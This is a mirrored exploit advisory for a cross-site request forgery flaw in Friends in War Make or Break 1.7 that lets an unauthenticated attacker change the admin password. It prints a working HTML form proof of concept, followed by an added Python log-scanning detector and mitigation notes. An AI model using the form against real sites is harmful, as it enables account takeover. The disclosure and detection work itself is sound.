Friends in War Make or Break 1.7 Cross-Site Request Forgery

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017070183

Below is a copy:

Friends in War Make or Break 1.7 - Unauthenticated admin password change

Url: http://software.friendsinwar.com/
     http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://www.shinnai.altervista.org/
---------------------------------------------------------------------

PROOF OF CONCEPT:
<form method="post" action="http://localhost/mob/admin/pass_edit.php?username=1">
<label>1) Choose a new password<br>2) Click on "Submit"<br>3) Login using "admin" and your new password<br><br></label>
<input type="text" name="password" value="ChangeMe">
<input type="text" name="submit" value="Edit+Password" hidden=true>
<input type="submit" value="Submit">
</form>
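
A defender can look for the request above in web-server access logs. The following is an added example, not part of the original advisory: it flags POSTs to admin/pass_edit.php whose Referer is missing or points to another host. The combined log format, the host name mob.example and the sample log lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" access-log format (assumed for this example).
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"'
)

# Constructed sample lines; hosts and addresses are documentation placeholders.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2017:10:00:01 +0000] "POST /mob/admin/pass_edit.php?username=1 HTTP/1.1" 200 512 "http://forum.example/thread.html" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Jul/2017:10:05:12 +0000] "POST /mob/admin/pass_edit.php?username=1 HTTP/1.1" 200 512 "http://mob.example/mob/admin/pass_edit.php?username=1" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Jul/2017:10:07:30 +0000] "POST /mob/admin/pass_edit.php?username=1 HTTP/1.1" 200 512 "-" "curl/7.50"',
    '192.0.2.9 - - [10/Jul/2017:10:08:02 +0000] "GET /mob/admin/pass_edit.php?username=1 HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def suspicious_password_changes(lines, site_host, endpoint="/admin/pass_edit.php"):
    """Return (client_ip, username, reason) for each POST to the password-change
    endpoint that was not submitted from a page on site_host."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue  # unparsable line, or not a form submission
        target = urlsplit(m["target"])
        if not target.path.endswith(endpoint):
            continue
        referer = m["referer"]
        ref_host = urlsplit(referer).hostname if referer not in ("", "-") else None
        if ref_host is None:
            reason = "no referer"
        elif ref_host != site_host.lower():
            reason = "cross-origin referer: " + ref_host
        else:
            continue  # submitted from the application's own page
        # The PoC selects the target account through the query string.
        username = parse_qs(target.query).get("username", ["?"])[0]
        hits.append((m["ip"], username, reason))
    return hits

if __name__ == "__main__":
    for hit in suspicious_password_changes(SAMPLE_LOG, "mob.example"):
        print(hit)
```

A missing Referer is only a lead, since some browsers and proxies strip it; the durable fix is in the application, which has to require an authenticated admin session and a per-session anti-CSRF token on this form.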

